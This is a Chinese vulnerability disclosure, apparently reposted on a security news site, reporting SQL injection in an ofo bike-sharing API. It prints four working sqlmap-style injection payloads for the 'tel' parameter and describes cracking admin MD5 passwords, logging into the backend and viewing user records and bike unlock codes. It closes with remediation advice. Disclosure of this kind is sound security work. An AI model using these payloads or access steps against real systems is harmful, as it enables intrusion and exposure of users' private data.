首页 > 安全 > 网站安全 >

ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

2016-04-26

某处api没有对 SQL 注入过滤,导致后台密码,车辆密码,用户隐私泄露。主站 www ofo so Api getPacket 红包页面没有对 SQL 注入过滤。

某处 api 没有对 SQL 注入过滤,导致后台密码,车辆密码,用户隐私泄露。

主站 www.ofo.so/Api/getPacket 红包页面没有对 SQL 注入过滤。

P1.jpg


可以直接注入。

---
Parameter: tel (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: tel=12343211234") AND 7541=7541#&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tel=12343211234") AND (SELECT 4714 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(4714=4714,1))),0x71716a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("SFUv"="SFUv&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: tel=12343211234");(SELECT * FROM (SELECT(SLEEP(5)))xnKx)#&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: tel=12343211234") AND (SELECT * FROM (SELECT(SLEEP(5)))UCSC) AND ("RqRC"="RqRC&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1
---


[INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.29, PHP 5.4.27

back-end DBMS: MySQL 5.0
另外警告一下 san.ofo.so 也有注入漏洞,懒得深入了,麻烦自查。

--tables

tables.png


所有后台用户密码为单次 md5,随意破。


user1.jpg


后台地址全都在 sp_auth_rule 里。没有授权可以随意访问。

随便登录一个试试

login.png





懒得脱库了,要跑太久,随便拖几个看看,好像 CEO 的学号和手机也漏了


user.png



车密码

carno.png



看这数据库一溜 null 看来代码管理真是混乱。。心疼小黄车

解决方案:

www.ofo.so 和 san.ofo.so 麻烦都上个 WAF 谢谢,很容易上马拿到认证用的学生证照片的。网站后台用thinkcmf请及时升级。

相关文章
最新文章
热点推荐